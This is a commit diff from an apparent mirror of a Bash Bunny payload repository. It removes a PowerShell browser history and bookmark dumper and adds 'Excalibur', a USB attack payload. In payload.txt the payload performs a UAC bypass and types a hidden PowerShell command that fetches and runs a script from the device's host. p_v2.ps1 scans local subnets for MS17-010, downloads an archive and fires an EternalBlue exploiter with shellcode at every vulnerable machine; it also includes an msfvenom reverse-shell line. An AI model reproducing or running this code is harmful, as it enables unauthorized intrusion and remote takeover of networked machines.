hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge ff49f78114 into 9bc2a0312d

pull/330/merge
Dvir S. 2024-10-02 14:27:16 -04:00 committed by GitHub
parent 9bc2a0312d ff49f78114
commit 1b8d0c09fb
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
5 changed files with 444 additions and 239 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

239
payloads/library/exfiltration/browserData/Get-BrowserData.ps1
View File

@ -1,239 +0,0 @@
function Get-BrowserInformation {
<#
.SYNOPSIS
Dumps Browser Information
Author: @424f424f
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Enumerates browser history or bookmarks for a Chrome, Internet Explorer,
and/or Firefox browsers on Windows machines.
.PARAMETER Browser
The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All'
.PARAMETER Datatype
Type of data to enumerate, 'History' or 'Bookmarks'
.PARAMETER UserName
Specific username to search browser information for.
.PARAMETER Search
Term to search for
.EXAMPLE
PS C:\> Get-BrowserInformation
Enumerates browser information for all supported browsers for all current users.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1
Enumerates bookmarks for Internet Explorer for the user 'user1'.
.EXAMPLE
PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github'
Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns
results matching the search term 'github'.
#>
[CmdletBinding()]
Param
(
[Parameter(Position = 0)]
[String[]]
[ValidateSet('Chrome','IE','FireFox', 'All')]
$Browser = 'All',
[Parameter(Position = 1)]
[String[]]
[ValidateSet('History','Bookmarks','All')]
$DataType = 'All',
[Parameter(Position = 2)]
[String]
$UserName = '',
[Parameter(Position = 3)]
[String]
$Search = ''
)
function ConvertFrom-Json20([object] $item){
#http://stackoverflow.com/a/29689642
Add-Type -AssemblyName System.Web.Extensions
$ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer
return ,$ps_js.DeserializeObject($item)
}
function Get-ChromeHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find Chrome History for username: $UserName"
}
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique
$Value | ForEach-Object {
$Key = $_
if ($Key -match $Search){
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Chrome'
DataType = 'History'
Data = $_
}
}
}
}
function Get-ChromeBookmarks {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName"
} else {
$Json = Get-Content $Path
$Output = ConvertFrom-Json20($Json)
$Jsonobject = $Output.roots.bookmark_bar.children
$Jsonobject.url |Sort -Unique | ForEach-Object {
if ($_ -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'Bookmark'
Data = $_
}
}
}
}
}
function Get-InternetExplorerHistory {
#https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/
$Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS
$Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
ForEach($Path in $Paths) {
$User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value
$Path = $Path | Select-Object -ExpandProperty PSPath
$UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs"
if (-not (Test-Path -Path $UserPath)) {
Write-Verbose "[!] Could not find IE History for SID: $Path"
}
else {
Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object {
$Key = $_
$Key.GetValueNames() | ForEach-Object {
$Value = $Key.GetValue($_)
if ($Value -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'IE'
DataType = 'History'
Data = $Value
}
}
}
}
}
}
}
function Get-InternetExplorerBookmarks {
$URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue
ForEach ($URL in $URLs) {
if ($URL.FullName -match 'Favorites') {
$User = $URL.FullName.split('\')[2]
Get-Content -Path $URL.FullName | ForEach-Object {
try {
if ($_.StartsWith('URL')) {
# parse the .url body to extract the actual bookmark location
$URL = $_.Substring($_.IndexOf('=') + 1)
if($URL -match $Search) {
New-Object -TypeName PSObject -Property @{
User = $User
Browser = 'IE'
DataType = 'Bookmark'
Data = $URL
}
}
}
}
catch {
Write-Verbose "Error parsing url: $_"
}
}
}
}
}
function Get-FireFoxHistory {
$Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"
if (-not (Test-Path -Path $Path)) {
Write-Verbose "[!] Could not find FireFox History for username: $UserName"
}
else {
$Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue
$Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique
$Value.Value |ForEach-Object {
if ($_ -match $Search) {
ForEach-Object {
New-Object -TypeName PSObject -Property @{
User = $UserName
Browser = 'Firefox'
DataType = 'History'
Data = $_
}
}
}
}
}
}
if (!$UserName) {
$UserName = "$ENV:USERNAME"
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-ChromeHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-ChromeBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-InternetExplorerHistory
}
if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) {
Get-InternetExplorerBookmarks
}
}
if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) {
if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) {
Get-FireFoxHistory
}
}
}

42
payloads/library/exploitation/Excalibur/README.md Normal file
View File

@ -0,0 +1,42 @@
# If you enjoyed this tool and you found it useful, I'll be happy for donations at 39om67XSXi1eAQNTgLXufw1xwR897JMWwv. Thanks!
# Excalibur
Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project.
It's purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
Excalibur may be used only for demostrations purposes only, and the developers are not responsible to any misuse or illegal usage.
# What does it do?
When Excalibur gets connected to the machine, it will run the following:
1. Trys to bypass UAC, or just get administrative rights
2. Gets interface info (IP addresses) and build a network map inside a TXT file.
3. Scans port 445 for the known "MS10-17" ("EternalBlue") vulnerability in every segment found.
4. Exploits every machine and drop a shell to a remote machine.
# How to?
Follow the steps here to compile a shellcode:
https://github.com/vivami/MS17-010
1. Copy payload.txt to the switch folder.
2. Copy the "eternablblue_exploit7.py" and compile it using Pyinstaller:
* "pip install pyinstaller"
* "pyinstaller --onefile MS17-010\eternablblue_exploit7.py"
3. Add your shellcode and the compiled exploiter into "a.zip" and copy it to the "loot" folder".
* a.zip needs to contain a compiled, standalone eternalblue exploiter from "vivami's" repo and the shellcode.
4. Copy the powershell script to (p_v2.ps1) to the loot folder.
# TODO
1. Add persistency in terms of add a new user account, and persistent shell.
2. Exploit other machines and applications in the network, with the credentials added in the persistency step.
3. Exfiltrate sensitive data from the network, outside.
4. Bug fixes, and exploits stabilizations.
# Notes
Excalibur is still in Beta, bugs are iminent.

BIN
payloads/library/exploitation/Excalibur/a.zip Normal file
View File

Binary file not shown.

331
payloads/library/exploitation/Excalibur/p_v2.ps1 Normal file
View File

@ -0,0 +1,331 @@
Add-Type -AssemblyName System.IO.Compression.FileSystem
$ComputerName = $env:COMPUTERNAME
function InterfacesFinder(){
foreach ($Computer in $ComputerName) {
if(Test-Connection -ComputerName $Computer -Count 1 -ea 0) {
try {
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $Computer -EA Stop | ? {$_.IPEnabled}
} catch {
Write-Warning "Error occurred while querying $computer."
Continue
}
foreach ($Network in $Networks) {
$IPAddress = $Network.IpAddress[0]
$SubnetMask = $Network.IPSubnet[0]
if ($SubnetMask -eq '255.255.255.0'){
$SubnetBit = 24
}
if ($SubnetMask -eq '255.255.0.0'){
$SubnetBit = 16
}
if ($SubnetMask -eq '255.0.0.0'){
$SubnetBit = 8
}
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=0
$octet = $octet -join '.'
$octet = $octet+'/'+$SubnetBit
$targets = "$env:TEMP\targets.txt"
$octet | Out-File -Append -encoding ascii $targets
}
}
}
}
function PScanner(){
$Source = @"
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace PingCastle.Scanners
{
public class ms17_010scanner
{
static public bool ScanForMs17_010(string computer)
{
Trace.WriteLine("Checking " + computer + " for MS17-010");
TcpClient client = new TcpClient();
client.Connect(computer, 445);
try
{
NetworkStream stream = client.GetStream();
byte[] negotiatemessage = GetNegotiateMessage();
stream.Write(negotiatemessage, 0, negotiatemessage.Length);
stream.Flush();
byte[] response = ReadSmbResponse(stream);
if (!(response[8] == 0x72 && response[9] == 00))
{
throw new InvalidOperationException("invalid negotiate response");
}
byte[] sessionSetup = GetSessionSetupAndXRequest(response);
stream.Write(sessionSetup, 0, sessionSetup.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x73 && response[9] == 00))
{
throw new InvalidOperationException("invalid sessionSetup response");
}
byte[] treeconnect = GetTreeConnectAndXRequest(response, computer);
stream.Write(treeconnect, 0, treeconnect.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (!(response[8] == 0x75 && response[9] == 00))
{
throw new InvalidOperationException("invalid TreeConnect response");
}
byte[] peeknamedpipe = GetPeekNamedPipe(response);
stream.Write(peeknamedpipe, 0, peeknamedpipe.Length);
stream.Flush();
response = ReadSmbResponse(stream);
if (response[8] == 0x25 && response[9] == 0x05 && response[10] ==0x02 && response[11] ==0x00 && response[12] ==0xc0 )
{
return true;
}
}
catch (Exception)
{
throw;
}
return false;
}
private static byte[] ReadSmbResponse(NetworkStream stream)
{
byte[] temp = new byte[4];
stream.Read(temp, 0, 4);
int size = temp[3] + temp[2] * 0x100 + temp[3] * 0x10000;
byte[] output = new byte[size + 4];
stream.Read(output, 4, size);
Array.Copy(temp, output, 4);
return output;
}
static byte[] GetNegotiateMessage()
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x72, // SMB Command: Negotiate Protocol (0x72)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
0x00,0x00, // Tree id 0
0x44,0x6d, // Process ID 27972
0x00,0x00, // User ID 0
0x42,0xc1, // Multiplex ID 49474
0x00, // WCT 0
0x31,0x00, // BCC 49
0x02,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x00, // LANMAN1.0
0x02,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x00, // LM1.2X002
0x02,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x00, // NT LANMAN 1.0
0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00, // NT LM 0.12
};
return EncodeNetBiosLength(output);
}
static byte[] GetSessionSetupAndXRequest(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x73, // SMB Command: Session Setup AndX (0x73)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x0d, // WCT 0
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved 00
0x00,0x00, // AndXOffset: 0
0xdf,0xff, // Max Buffer: 65503
0x02,0x00, // Max Mpx Count: 2
0x01,0x00, // VC Number: 1
0x00,0x00,0x00,0x00, // Session Key: 0x00000000
0x00,0x00, // ANSI Password Length: 0
0x00,0x00, // Unicode Password Length: 0
0x00,0x00,0x00,0x00, // Reserved: 00000000
0x40,0x00,0x00,0x00, // Capabilities: 0x00000040, NT Status Codes
0x26,0x00, // Byte Count (BCC): 38
0x00, // Account:
0x2e,0x00, // Primary Domain: .
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x32,0x31,0x39,0x35,0x00, // Native OS: Windows 2000 2195
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x32,0x30,0x30,0x30,0x20,0x35,0x2e,0x30,0x00 // Native LAN Manager: Windows 2000 5.0
};
return EncodeNetBiosLength(output);
}
private static byte[] EncodeNetBiosLength(byte[] input)
{
byte[] len = BitConverter.GetBytes(input.Length-4);
input[3] = len[0];
input[2] = len[1];
input[1] = len[2];
return input;
}
static byte[] GetTreeConnectAndXRequest(byte[] data, string computer)
{
MemoryStream ms = new MemoryStream();
BinaryReader reader = new BinaryReader(ms);
byte[] part1 = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x75, // SMB Command: Tree Connect AndX (0x75)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x04, // WCT 4
0xff, // AndXCommand: No further commands (0xff)
0x00, // Reserved: 00
0x00,0x00, // AndXOffset: 0
0x00,0x00, // Flags: 0x0000
0x01,0x00, // Password Length: 1
0x19,0x00, // Byte Count (BCC): 25
0x00, // Password: 00
0x5c,0x5c};
byte[] part2 = new byte[] {
0x5c,0x49,0x50,0x43,0x24,0x00, // Path: \\ip_target\IPC$
0x3f,0x3f,0x3f,0x3f,0x3f,0x00
};
ms.Write(part1, 0, part1.Length);
byte[] encodedcomputer = new ASCIIEncoding().GetBytes(computer);
ms.Write(encodedcomputer, 0, encodedcomputer.Length);
ms.Write(part2, 0, part2.Length);
ms.Seek(0, SeekOrigin.Begin);
byte[] output = reader.ReadBytes((int) reader.BaseStream.Length);
return EncodeNetBiosLength(output);
}
static byte[] GetPeekNamedPipe(byte[] data)
{
byte[] output = new byte[] {
0x00,0x00,0x00,0x00, // Session Message
0xff,0x53,0x4d,0x42, // Server Component: SMB
0x25, // SMB Command: Trans (0x25)
0x00, // Error Class: Success (0x00)
0x00, // Reserved
0x00,0x00, // Error Code: No Error
0x18, // Flags
0x01,0x28, // Flags 2
0x00,0x00, // Process ID High 0
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, // Signature
0x00,0x00, // Reserved
data[28],data[29],data[30],data[31],data[32],data[33],
0x42,0xc1, // Multiplex ID 49474
0x10, // Word Count (WCT): 16
0x00,0x00, // Total Parameter Count: 0
0x00,0x00, // Total Data Count: 0
0xff,0xff, // Max Parameter Count: 65535
0xff,0xff, // Max Data Count: 65535
0x00, // Max Setup Count: 0
0x00, // Reserved: 00
0x00,0x00, // Flags: 0x0000
0x00,0x00,0x00,0x00, // Timeout: Return immediately (0)
0x00,0x00, // Reserved: 0000
0x00,0x00, // Parameter Count: 0
0x4a,0x00, // Parameter Offset: 74
0x00,0x00, // Data Count: 0
0x4a,0x00, // Data Offset: 74
0x02, // Setup Count: 2
0x00, // Reserved: 00
0x23,0x00, // Function: PeekNamedPipe (0x0023)
0x00,0x00, // FID: 0x0000
0x07,0x00, // Byte Count (BCC): 7
0x5c,0x50,0x49,0x50,0x45,0x5c,0x00 // Transaction Name: \PIPE\
};
return EncodeNetBiosLength(output);
}
}
}
"@
Add-Type -TypeDefinition $Source
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -ComputerName $env:COMPUTERNAME -EA Stop | ? {$_.IPEnabled}
$ping = New-Object System.Net.NetworkInformation.Ping
$a = 1
$z = 254
while ($a -le $z) {
foreach($network in $networks){
$IPAddress = $Network.IpAddress[0]
$octet =($IPAddress -split ' . ')[-1]-split '\.'
$octet[-1]=$a
$octet = $octet -join '.'
if($ping.send($octet,"50").status -eq "Success"){
try{
if ([PingCastle.Scanners.ms17_010scanner]::ScanForMs17_010($octet) -eq "True"){
Write-Output "Machine $octet is vulnerable!" > $env:Temp\results.txt
}
}
catch{
}
}
}
$a++
}
}
function Unzip
{
param([string]$zipfile, [string]$outpath)
[System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}
function Exploit(){
$results = Get-Content "$env:TEMP\results.txt"
#Meterpreter: Generate a new binary payload, call it .raw and copy it to the temp folder
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.28.130 LPORT=31337 -f raw > meterpreter.raw
#$meterpreter = Get-Content "$env:TEMP\meterpreter.raw"
#$shellcode = Get-Content "$env:TEMP\shellcode.bin"
#Combines the binary ASM shellcode and the binary meterpreter payload
#$shellcode | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
#$meterpreter | Out-File -Append "$env:TEMP\shellcode_exploit.bin"
foreach ($result in $results) {
#Invoke-EternalBlue -target $result -max_attempts 3 -initial_grooms 12
& $env:TEMP\eternalblue_exploit7.exe $result $env:TEMP'\shellcode_kali.bin' '12'
}
}
InterfacesFinder
powershell Start-Sleep 1 ;
PScanner
powershell Start-Sleep 1 ;
Invoke-WebRequest 'http://172.16.64.1/a.zip' -OutFile "$env:TEMP\a.zip"
Unzip $env:Tmp"\a.zip" $env:Tmp"\"
Exploit
#TODO
#persistency
#Add a new user account.
#Obfuscation
#delete temp files, Generate a report to the loot folder.

71
payloads/library/exploitation/Excalibur/payload.txt Normal file
View File

@ -0,0 +1,71 @@
#!/bin/bash
# .-.
# (0.0)
# '=.|m|.='
# .='/@\`=.
# @8@
# _ 8@8 _
# (@__/@8@\__@)
# `-=:8@8:=-'
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# |:|
# \:/
# ^
#
# Title: Excalibur
# Author: Dviros, Dora
# Version: 1.0
#
# Excalibur is an APT based "Powershell" for the Bashbunny project.
# Its purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain.
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/Excalibur
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p_v2.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
sleep 60
done